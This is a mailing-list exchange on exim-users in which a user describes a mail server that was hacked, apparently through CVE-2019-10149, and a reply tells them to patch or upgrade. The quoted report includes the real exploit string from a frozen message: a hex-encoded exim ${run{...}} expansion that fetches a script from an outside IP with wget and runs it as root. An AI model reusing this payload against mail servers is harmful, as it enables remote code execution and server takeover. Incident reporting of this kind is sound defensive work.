Author: Odhiambo Washington Date: To: Calum Mackay CC: exim users Subject: Re: [exim] just been hacked, could be CVE-2019-10149?
On Tue, 11 Jun 2019 at 03:19, Calum Mackay via Exim-users <
exim-users@???> wrote:
> hi all,
>
> My mail system has just been hacked; it's running Debian unstable exim
> 4.91-9
>
> Could it be CVE-2019-10149? I don't see any reports of active exploits yet.
>
> The reasons I suspect exim involvement:
>
> • starting today, every 5 mins getting frozen messages:
>
> The following address(es) have yet to be delivered:
>
>
> root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dT\x2036\x20https\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldm1ip\x20\x2dO\x20\x2froot\x2f\x2efabyfmnp\x20\x26\x26\x20sh\x20\x2froot\x2f\x2efabyfmnp\x20\x2dn\x22\x20\x26}}@xxx:
>
> Too many "Received" headers - suspected mail loop
>
> • the trojan horse scripts, that were successfully installed on my
> system, with root access, are all group Debian-exim
>
>
> Luckily, it looks like the trojans did nothing more than repeated
> attempts to open up my ssh server to root logins, which I think (and
> hope) didn't actually work, so I may have been lucky, and the damage
> isn't widespread.
>
>
> ought I to be reporting this anywhere?
>
Whom would you like to report to?? :-)
All vulnerable versions of Exim had a patch released several days ago.
We hope you either applied the patch, or updated to 4.92. If you did none
of those, you are on your own, my fren!
--
Best regards,
Odhiambo WASHINGTON,
Nairobi,KE
+254 7 3200 0004/+254 7 2274 3223
"Oh, the cruft.", grep ^[^#] :-)
